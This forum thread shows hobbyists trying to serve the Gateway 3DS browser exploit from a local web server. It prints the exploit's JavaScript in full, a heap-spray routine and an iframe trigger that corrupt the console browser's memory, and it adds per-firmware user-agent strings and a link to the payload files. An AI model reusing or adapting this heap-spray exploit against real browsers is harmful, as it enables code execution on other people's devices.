Hacking [Attempt] Running GW3.0 Web Exploit on a Local Network

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.

So the question is, since the browser exploit just loads launcher.dat from the sd card ( smc://launcher.dat ), should it work just the same on my network. The xampp install works fine.



The files I used for my solution were from from Falo:

the region doesn't matter, i made a simple c# app to download all of the different payloads and only the version string matters.

fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"

so there are 5 different payloads.
here the payloads in html and as binary dat:

http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z

There were various instructions from others in this thread, read for details.
 
  • Like
Reactions: bowser

Venseer

A weapon to surpass Metal Gear
Member
Joined
Dec 12, 2013
Messages
198
Trophies
0
Age
31
Location
Kennedy Space Center
XP
297
Country
Brazil
I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.

So the question is, since the browser exploit just loads launcher.dat from the sd card ( smc://launcher.dat ), should it work just the same on my network. The xampp install works fine.

Anyone have a solution?
It's a PHP page
Maybe there is hidden PHP code on it? Not sure
 
  • Like
Reactions: Kelton2

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
Just to get it out of the way, this is the html on the page in question,
HTML:
<html>
<head>
<style>
    body {
        color:white;
        background:black;
    }
   
   
</style>
<script>
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
        mem.push(t);
    }
 
    function dsm(evnt) {
        var mem = [];
 
        for (var j = 20; j < 430; j++) {
            magicfun(mem, j, unescape("\u0000\u08e0\u0004\u08e0\u0008\u08e0\u000c\u08e0\u0010\u08e0\u0014\u08e0\u0018\u08e0\u001c\u08e0\u0020\u08e0\u0024\u08e0\u0028\u08e0\u002c\u08e0\u0030\u08e0\u0034\u08e0\u0038\u08e0\u003c\u08e0\u0040\u08e0\u0044\u08e0\u0048\u08e0\u004c\u08e0\u0050\u08e0\u0054\u08e0\u0058\u08e0\u005c\u08e0\u0060\u08e0\u0064\u08e0\u0068\u08e0\u006c\u08e0\u0070\u08e0\u0074\u08e0\u0078\u08e0\u007c\u08e0\u0080\u08e0\u0084\u08e0\u0088\u08e0\u008c\u08e0\u0090\u08e0\u0094\u08e0\u0098\u08e0\u009c\u08e0\u00a0\u08e0\u00a4\u08e0\u00a8\u08e0\u00ac\u08e0\u00b0\u08e0\u00b4\u08e0\u00b8\u08e0\u00bc\u08e0\u00c0\u08e0\u00c4\u08e0\u00c8\u08e0\u00cc\u08e0\u00d0\u08e0\u00d4\u08e0\u00d8\u08e0\u00dc\u08e0\u00e0\u08e0\u00e4\u08e0\u00e8\u08e0\u00ec\u08e0\u00f0\u08e0\u00f4\u08e0\u00f8\u08e0\u00fc\u08e0\u0100\u08e0\u0104\u08e0\u0108\u08e0\u010c\u08e0\u0110\u08e0\u0114\u08e0\u0118\u08e0\u011c\u08e0\u0120\u08e0\u0124\u08e0\u0128\u08e0\u012c\u08e0\u0130\u08e0\u0134\u08e0\u0138\u08e0\u013c\u08e0\u0140\u08e0\u0144\u08e0\u0148\u08e0\u014c\u08e0\u0150\u08e0\u0154\u08e0\u0158\u08e0\u015c\u08e0\u0160\u08e0\u0164\u08e0\u0168\u08e0\u016c\u08e0\u0170\u08e0\u0174\u08e0\u0178\u08e0\u017c\u08e0\u0180\u08e0\u0184\u08e0\u0188\u08e0\u018c\u08e0\u0190\u08e0\u0194\u08e0\u0198\u08e0\u019c\u08e0\u01a0\u08e0\u01a4\u08e0\u01a8\u08e0\u01ac\u08e0\u01b0\u08e0\u01b4\u08e0\u01b8\u08e0\u01bc\u08e0\u01c0\u08e0\u01c4\u08e0\u01c8\u08e0\u01cc\u08e0\u01d0\u08e0\u01d4\u08e0\u01d8\u08e0\u01dc\u08e0\u01e0\u08e0\u01e4\u08e0\u01e8\u08e0\u01ec\u08e0\u01f0\u08e0\u01f4\u08e0\u01f8\u08e0\u01fc\u08e0"));
        }
    }
</script>
</head>
<body>
        <h1 align="center">GATEWAY 3DS LOADING...</h1>
</body>
</html>

It should run no matter what server it is on right? ( local or not )
 

hias

Active Member
Newcomer
Joined
Jun 16, 2014
Messages
32
Trophies
0
Age
44
XP
132
Country
Argentina
No, you downloaded the wrong file, you miss the hidden iframe and the correct payload.
Check my post on the main thread.
Visit the site on your pc using the correct 3ds user agent and try again please :)
 
  • Like
Reactions: Margen67

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
No, you downloaded the wrong file, you miss the hidden iframe and the correct payload.
Check my post on the main thread.
Visit the site on your pc using the correct 3ds user agent and try again please :)

so thats the issue, will move to a normal internet connection and try again.

Does anyone have the contents of the iframe?
 

hias

Active Member
Newcomer
Joined
Jun 16, 2014
Messages
32
Trophies
0
Age
44
XP
132
Country
Argentina
The iframe just executes the javascript code via event. Not sure if this is needed and part of the browser bug. The important part is the correct payload.
 

Thomas12345

Well-Known Member
Member
Joined
Dec 1, 2014
Messages
551
Trophies
0
Age
36
XP
281
Country
Canada
The frame.html

Code:
<html>
        <head>
                <script>
                        var nb = 0;
                        function handleBeforeLoad() {
                                if (++nb == 1) {
                                        p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                                } else if (nb == 2) {
                                        p.removeChild(f);
                                }
                        }
 
                        function documentLoaded() {
                                f = window.frameElement;
                                p = f.parentNode;
                                var o = document.createElement("object");
                                o.addEventListener('beforeload', handleBeforeLoad, false);
                                document.body.appendChild(o);
                        }
 
                        window.onload = documentLoaded;
                </script>
        </head>
        <body>
                KEKEKEKEK...
        </body>
</html>
 
  • Like
Reactions: Margen67 and bendrr

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
The frame.html

Code:
<html>
        <head>
                <script>
                        var nb = 0;
                        function handleBeforeLoad() {
                                if (++nb == 1) {
                                        p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                                } else if (nb == 2) {
                                        p.removeChild(f);
                                }
                        }
 
                        function documentLoaded() {
                                f = window.frameElement;
                                p = f.parentNode;
                                var o = document.createElement("object");
                                o.addEventListener('beforeload', handleBeforeLoad, false);
                                document.body.appendChild(o);
                        }
 
                        window.onload = documentLoaded;
                </script>
        </head>
        <body>
                KEKEKEKEK...
        </body>
</html>


Thanks, will try it
 
  • Like
Reactions: Margen67

Helper

Well-Known Member
Member
Joined
Sep 14, 2009
Messages
136
Trophies
0
XP
227
Country
United States
Are y'all entirely certain the web browser entrypoint only loads launcher.dat? If so, why--do you have evidence to suggest so?
If not, I'd probably try sniffing the network to see if the 3DS downloads any other data when the exploit is executed (in the normal way, from the GW website).

Also, could you clarify "just loads the page and does nothing"? I assume this means 'I see "GATEWAY 3DS LOADING"; the web browser does not close with an error or otherwise misbehave'; is this correct?

(I'm a useless asshole who can't help you anyway--sorry ;_;. I'm just interested in the browser exploit.)
 

andzalot55

I'm very delicious. mmmm.
Member
Joined
Nov 14, 2014
Messages
808
Trophies
0
Location
Mc Donalds.
XP
2,093
Country
Canada
I can't browse anything but ssl ( https:// ) right now with my 3ds browsers. I copied the javascript and html at http://go.gateway-3ds.com/index.php and saved it on my local xampp network so I can browse it from my network. No joy so far, just loads the page and does nothing. It's on 6.2 firmware. I formatted it, cleared history and cookies.

So the question is, since the browser exploit just loads launcher.dat from the sd card ( smc://launcher.dat ), should it work just the same on my network. The xampp install works fine.

Anyone have a solution?


Have you tried the QR Code version? I saw a post about it.
 

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
Are y'all entirely certain the web browser entrypoint only loads launcher.dat? If so, why--do you have evidence to suggest so?
If not, I'd probably try sniffing the network to see if the 3DS downloads any other data when the exploit is executed (in the normal way, from the GW website).

Also, could you clarify "just loads the page and does nothing"? I assume this means 'I see "GATEWAY 3DS LOADING"; the web browser does not close with an error or otherwise misbehave'; is this correct?

(I'm a useless asshole who can't help you anyway--sorry ;_;. I'm just interested in the browser exploit.)



The browser closes with an error after the page loads asking me to restart the 3ds when I load the exploit locally. I do see gateway 3ds loading... before it closes.
 

Helper

Well-Known Member
Member
Joined
Sep 14, 2009
Messages
136
Trophies
0
XP
227
Country
United States
The browser closes with an error after the page loads asking me to restart the 3ds when I load the exploit locally. I do see gateway 3ds loading... before it closes.
Interesting. And that's the error which asks you to save and then restart it yourself--not the one which forces a shutdown as soon as you acknowledge the message?

If it's the latter, I'd say something has gone very wrong somewhere. But if it's the former, I think you're almost there. I kept getting the error message upon loading the page; I finally got it to work by placing launcher.dat on a different, newly-formatted SD card. Anyway, it sounds like you have your server set up perfectly--kudos for that!
 

bendrr

Well-Known Member
OP
Member
Joined
Dec 3, 2014
Messages
163
Trophies
0
Age
49
XP
150
Country
United States
The first error you mentioned is the one. I looked at the javascript functions that I see and it's a buffer overload I think. Wonder why it's not working. The console doesn't throw any errors with default settings. I wonder what firebug would report if anything.

*edit
Just an undefined error, no specifics so far. It's my network I'm positive but I wonder why it can't be executed off their server. If it matters to anyone with the same error, I also get "Failed to load part of this page" when trying to use it locally.

If they enabled ssl for the /go/ folder, that would solve some problems for me (and others?).

Another note, wish they would release the index.php and javascript for a backup url and even better, offline mode. I suppose offline mode is in the next update maybe? The index file has some of the exploit, calculations I think?

Any ideas?
 

Site & Scene News

Popular threads in this forum

General chit-chat
Help Users
    BakerMan @ BakerMan: what would happen if i ate the whole bottle? would i become infertile?